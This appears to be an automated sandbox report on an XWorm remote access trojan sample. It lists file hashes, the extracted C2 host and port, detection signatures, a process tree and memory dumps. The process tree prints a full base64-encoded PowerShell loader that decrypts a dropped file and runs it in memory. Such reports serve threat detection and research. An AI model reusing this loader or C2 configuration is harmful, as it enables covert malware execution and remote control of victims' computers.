Analysis

  • max time kernel
    144s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16/05/2024, 01:05

General

  • Target

    1dc12b7529e0f04e870bc5c2aa78f053f2a0602a291ee5401ca4db11fbf6b9bc.exe

  • Size

    766KB

  • MD5

    b808d5b7433f2f77bdbf5fd5df203ec9

  • SHA1

    5a9c635489b3fecd8d9ecbaa557244df8338c762

  • SHA256

    1dc12b7529e0f04e870bc5c2aa78f053f2a0602a291ee5401ca4db11fbf6b9bc

  • SHA512

    7a9a2c058d50fc9e60ec71698e284607ac8b38942b69bb60792d4346937b5daa32ecb03aef02e694c66bc20934ab9ac40c91cb87a3fa509863b98e71dacbf266

  • SSDEEP

    12288:Mdzd+m39dkAf5YSyBThO6QglvZUXI/KhrlpAYxylfB/VL1Fb91J36HAgVU:MdhkszyqFglRGI4rfAFlfB/Z9f+R6

Malware Config

Extracted

Family

xworm

Version

5.0

C2

zafa02.hopto.org:4545

Mutex

KecGg5CGEilLm2a5

Attributes
  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Detects Windows executables referencing non-Windows User-Agents 1 IoCs
  • Detects executables packed with or use KoiVM 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1dc12b7529e0f04e870bc5c2aa78f053f2a0602a291ee5401ca4db11fbf6b9bc.exe
    "C:\Users\Admin\AppData\Local\Temp\1dc12b7529e0f04e870bc5c2aa78f053f2a0602a291ee5401ca4db11fbf6b9bc.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1704
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgANQAwADAAMAApAAoACgAkAFQAZQBtAHAARABpAHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAKACQAUABhAHQAdABlAHIAbgAgAD0AIAAnAGYAaQBsAGUALQAqAC4AcAB1AHQAaQBrACcACgAkAEwAYQB0AGUAcwB0AEYAaQBsAGUAIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAVABlAG0AcABEAGkAcgAgAC0ARgBpAGwAdABlAHIAIAAkAFAAYQB0AHQAZQByAG4AIAB8ACAAUwBvAHIAdAAtAE8AYgBqAGUAYwB0ACAATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQAgAC0ARABlAHMAYwBlAG4AZABpAG4AZwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBGAGkAcgBzAHQAIAAxAAoACgBmAHUAbgBjAHQAaQBvAG4AIADjicZbIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAKWUGVMsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkABFUz5EsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAHBlbmMKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAKBSxltoViAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJACgUsZbaFYuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJACgUsZbaFYuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFAASwBDAFMANwAKAAoAIAAgACAAIAAkAOOJxltoViAAPQAgACQAoFLGW2hWLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQApZQZUywAIAAkABFUz5EpAAoAIAAgACAAIAAkAOOJxltwZW5jIAA9ACAAJADjicZbaFYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAHBlbmMsACAAMAAsACAAJABwZW5jLgBMAGUAbgBnAHQAaAApAAoACQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkAOOJxltwZW5jCgB9AAoACgAkAKWUGVMgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAyAEUALAAgADAAeABCAEIALAAgADAAeAA3ADAALAAgADAAeAAyAEIALAAgADAAeABEADYALAAgADAAeABDAEYALAAgADAAeABFADgALAAgADAAeABDADcALAAgADAAeAAxAEQALAAgADAAeAA1ADYALAAgADAAeABCAEQALAAgADAAeAA0ADEALAAgADAAeAA5ADgALAAgADAAeABFADYALAAgADAAeABBAEUALAAgADAAeAAxADIALAAgADAAeABDADQALAAgADAAeAAxADQALAAgADAAeAA4ADAALAAgADAAeAA5AEEALAAgADAAeAAxADEALAAgADAAeAA4ADkALAAgADAAeAAzADYALAAgADAAeABFAEYALAAgADAAeAAyADAALAAgADAAeAAxAEUALAAgADAAeAA5ADUALAAgADAAeAA3AEMALAAgADAAeAA0AEQALAAgADAAeAAxADkALAAgADAAeAAxAEIALAAgADAAeABCADUAKQAKACQAEVTPkSAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4ADIAMgAsACAAMAB4AEYAMAAsACAAMAB4ADEARgAsACAAMAB4ADIAMQAsACAAMAB4ADkAOQAsACAAMAB4ADAANwAsACAAMAB4ADUAMAAsACAAMAB4AEMARAAsACAAMAB4AEYAMQAsACAAMAB4ADMAQQAsACAAMAB4AEIAOAAsACAAMAB4ADkANgAsACAAMAB4ADcAOAAsACAAMAB4ADIAMAAsACAAMAB4ADAAOQAsACAAMAB4AEEARgApAAoACgBpAGYAIAAoACQATABhAHQAZQBzAHQARgBpAGwAZQAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAIdl9k7vjYRfIAA9ACAAJABMAGEAdABlAHMAdABGAGkAbABlAC4ARgB1AGwAbABOAGEAbQBlAAoAIAAgACAAIAAkAKBSxltXW4KCIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAIdl9k7vjYRfKQA7AAoAIAAgACAAIAAkAOOJxluFUblbIAA9ACAA44nGWyAALQCllBlTIAAkAKWUGVMgAC0AEVTPkSAAJAARVM+RIAAtAHBlbmMgACQAoFLGW1dbgoIKAAoAIAAgACAAIAAkAAt6j17GliAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQA44nGW4VRuVspACkAOwAKACAAIAAgACAAJABlUeNTuXAgAD0AIAAkAAt6j17Gli4ARQBuAHQAcgB5AFAAbwBpAG4AdAA7AAoAIAAgACAAIAAkAGVR41O5cC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA
      2⤵
      • Suspicious use of SetThreadContext
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1548
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1444
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        3⤵
          PID:3396
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3644 --field-trial-handle=2256,i,6670388345726423024,18382795228658886258,262144 --variations-seed-version /prefetch:8
      1⤵
        PID:3916

      Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0o1s5zuk.pqz.ps1

              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            • C:\Users\Admin\AppData\Local\Temp\file-19822.putik

              Filesize

              20KB

              MD5

              e8a8497d146c7622db21a6fec0c4dd96

              SHA1

              cf80f1e8ffef15623c4932acf63642b9b4153068

              SHA256

              b9138b8834bdcde66528445885ffb2105734cc74e05f877de5aa5c4602a21a9a

              SHA512

              198a1c34e906032fceb98a6425037c670994ce6388222909e9901a847f509573ea835fd4348c162a4fa8acdcd5ff59068d46d8dffb040e04fc971fe9efd65938

            • memory/1444-18-0x0000000000400000-0x000000000040E000-memory.dmp

              Filesize

              56KB

            • memory/1444-24-0x00000000745B0000-0x0000000074D60000-memory.dmp

              Filesize

              7.7MB

            • memory/1444-23-0x00000000745BE000-0x00000000745BF000-memory.dmp

              Filesize

              4KB

            • memory/1444-22-0x00000000745B0000-0x0000000074D60000-memory.dmp

              Filesize

              7.7MB

            • memory/1444-20-0x0000000005820000-0x00000000058BC000-memory.dmp

              Filesize

              624KB

            • memory/1444-19-0x00000000745BE000-0x00000000745BF000-memory.dmp

              Filesize

              4KB

            • memory/1548-17-0x000002B2E3010000-0x000002B2E3072000-memory.dmp

              Filesize

              392KB

            • memory/1548-1-0x00007FF97B673000-0x00007FF97B675000-memory.dmp

              Filesize

              8KB

            • memory/1548-16-0x000002B2E2C80000-0x000002B2E2C8A000-memory.dmp

              Filesize

              40KB

            • memory/1548-14-0x00007FF97B670000-0x00007FF97C131000-memory.dmp

              Filesize

              10.8MB

            • memory/1548-21-0x00007FF97B670000-0x00007FF97C131000-memory.dmp

              Filesize

              10.8MB

            • memory/1548-13-0x00007FF97B670000-0x00007FF97C131000-memory.dmp

              Filesize

              10.8MB

            • memory/1548-12-0x00007FF97B670000-0x00007FF97C131000-memory.dmp

              Filesize

              10.8MB

            • memory/1548-2-0x000002B2E2C50000-0x000002B2E2C72000-memory.dmp

              Filesize

              136KB